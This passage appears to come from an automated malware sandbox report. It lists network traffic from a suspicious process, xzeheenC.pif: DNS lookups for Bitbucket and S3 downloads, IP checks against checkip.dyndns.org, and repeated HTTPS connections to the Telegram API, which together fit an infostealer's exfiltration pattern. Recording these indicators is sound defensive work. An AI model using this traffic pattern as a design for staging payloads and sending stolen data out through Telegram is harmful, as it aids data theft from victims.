                                                                                                                      Dec 18, 2024 16:18:19.849174023 CET44350004149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:19.849242926 CET50004443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:19.849546909 CET50004443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:19.849562883 CET44350004149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:20.046001911 CET44349998149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:20.046096087 CET44349998149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:20.046216965 CET49998443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:29.746915102 CET44350039149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:29.748687983 CET50039443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:29.748717070 CET44350039149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:29.748810053 CET50039443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:29.748819113 CET44350039149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.205902100 CET44350037149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.206121922 CET44350037149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.206322908 CET50037443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.206554890 CET50037443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.208149910 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.208197117 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.208389997 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.208538055 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.208549023 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.323339939 CET44350038149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.323563099 CET44350038149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.323636055 CET50038443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.324085951 CET50038443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.325392008 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.325429916 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.325550079 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.325723886 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.325740099 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.356199980 CET44350039149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.360810995 CET44350039149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.362253904 CET50039443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.362448931 CET50039443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.363532066 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.363575935 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:30.363738060 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.363965034 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:30.363977909 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.574090958 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.577574968 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:31.577590942 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.577691078 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:31.577694893 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.705984116 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.708977938 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:31.708990097 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.709076881 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:31.709083080 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.734251022 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.736170053 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:31.736193895 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:31.736258984 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:31.736263990 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.166515112 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.166754007 CET44350044149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.170192003 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.170731068 CET50044443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.172144890 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.172177076 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.174196005 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.174572945 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.174585104 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.380108118 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.381488085 CET44350045149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.381578922 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.381882906 CET50045443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.383268118 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.383316994 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.383970976 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.384182930 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.384195089 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.422219038 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.422497034 CET44350046149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.422621965 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.423126936 CET50046443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.424382925 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.424427032 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:32.424544096 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.424841881 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:32.424858093 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.538669109 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.548979998 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:33.549012899 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.549072027 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:33.549079895 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.752985001 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.755336046 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:33.755361080 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.755472898 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:33.755480051 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.792736053 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.796297073 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:33.796313047 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:33.796386003 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:33.796391010 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.245974064 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.246354103 CET44350049149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.246432066 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.246838093 CET50049443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.248858929 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.248888016 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.248963118 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.249278069 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.249289036 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.375989914 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.376354933 CET44350052149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.376595974 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.376790047 CET50052443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.378542900 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.378573895 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.378654003 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.378890038 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.378905058 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.414062023 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.414170980 CET44350053149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.414343119 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.415105104 CET50053443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.417587042 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.417609930 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:34.417893887 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.418181896 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:34.418196917 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.614137888 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.616204023 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:35.616269112 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.616385937 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:35.616398096 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.761607885 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.767995119 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:35.768013954 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.768104076 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:35.768112898 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.789835930 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.792249918 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:35.792270899 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:35.792448044 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:35.792453051 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.176857948 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.176964998 CET44350057149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.177020073 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.177716970 CET50057443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.200017929 CET50065443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.200069904 CET44350065149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.202169895 CET50065443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.202518940 CET50065443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.202534914 CET44350065149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.335170984 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.336667061 CET44350058149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.340229988 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.367810011 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.367912054 CET44350059149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:36.369115114 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.396559000 CET50058443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.396809101 CET50059443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:36.398384094 CET50066443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.846672058 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.847031116 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:45.847044945 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.296411991 CET44350096149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.296494007 CET44350096149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.296979904 CET50096443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.298795938 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.298842907 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.299345970 CET50096443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.302620888 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.302623034 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.302664042 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.534729004 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.540321112 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.540357113 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:46.540445089 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:46.540465117 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.101928949 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.102011919 CET44350098149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.102411032 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:47.229437113 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.336328030 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:47.669385910 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:47.726883888 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.894192934 CET50098443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.894834042 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.894867897 CET44350106149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:50.894932985 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.895226955 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.895236969 CET44350106149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:50.923038006 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.923067093 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:50.923120022 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:50.923127890 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.174660921 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.174690008 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.174827099 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.174834013 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.477611065 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.477700949 CET44350100149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.477962971 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.478287935 CET50100443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.478913069 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.478951931 CET44350107149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.479020119 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.479228973 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.479243994 CET44350107149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.722232103 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.722326040 CET44350104149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.722492933 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.722995996 CET50104443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724267006 CET50108443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724320889 CET44350108149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:51.724406958 CET50108443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724658012 CET50108443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:51.724673033 CET44350108149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:52.257829905 CET44350106149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:52.305058956 CET50106443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:52.860621929 CET44350107149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:52.914378881 CET50107443192.168.2.5149.154.167.220
                                                                                                                      Dec 18, 2024 16:18:53.125948906 CET44350108149.154.167.220192.168.2.5
                                                                                                                      Dec 18, 2024 16:18:53.180018902 CET50108443192.168.2.5149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 16:16:39.451078892 CET | 56396 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 16:16:39.589360952 CET | 53 | 56396 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 16:16:41.964534998 CET | 50357 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 16:16:42.342196941 CET | 53 | 50357 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 16:16:50.664197922 CET | 62017 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 16:16:50.813894987 CET | 53 | 62017 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 16:17:01.006388903 CET | 56727 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 16:17:01.145469904 CET | 53 | 56727 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 16:16:39.451078892 CET | 192.168.2.5 | 1.1.1.1 | 0x6d94 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:41.964534998 CET | 192.168.2.5 | 1.1.1.1 | 0xb94b | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:50.664197922 CET | 192.168.2.5 | 1.1.1.1 | 0xe677 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:17:01.006388903 CET | 192.168.2.5 | 1.1.1.1 | 0xc85 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 16:16:39.589360952 CET | 1.1.1.1 | 192.168.2.5 | 0x6d94 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:39.589360952 CET | 1.1.1.1 | 192.168.2.5 | 0x6d94 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:39.589360952 CET | 1.1.1.1 | 192.168.2.5 | 0x6d94 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.32.148 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.24.26 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.225.201 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.217.1 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.213 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.137.41 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.199.169 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:42.342196941 CET | 1.1.1.1 | 192.168.2.5 | 0xb94b | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.213.33 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:50.813894987 CET | 1.1.1.1 | 192.168.2.5 | 0xe677 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 16:16:50.813894987 CET | 1.1.1.1 | 192.168.2.5 | 0xe677 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:50.813894987 CET | 1.1.1.1 | 192.168.2.5 | 0xe677 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:50.813894987 CET | 1.1.1.1 | 192.168.2.5 | 0xe677 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:50.813894987 CET | 1.1.1.1 | 192.168.2.5 | 0xe677 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:16:50.813894987 CET | 1.1.1.1 | 192.168.2.5 | 0xe677 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:17:01.145469904 CET | 1.1.1.1 | 192.168.2.5 | 0xc85 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                      • bitbucket.org
                                                                                                                      • bbuseruploads.s3.amazonaws.com
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49731 | 132.226.247.73 | 80 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 16:16:50.982860088 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 18, 2024 16:16:52.435329914 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 15:16:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 311d2843be3e0ec9cf520af164935f44
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49759 | 132.226.247.73 | 80 | 432 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 16:17:02.002053022 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 18, 2024 16:17:03.327090025 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 15:17:03 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ef3be955122cdf3f414914dc7a935acc
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49775 | 132.226.247.73 | 80 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 16:17:08.791676998 CET | 151 | OUT | GET / HTTP/1.1
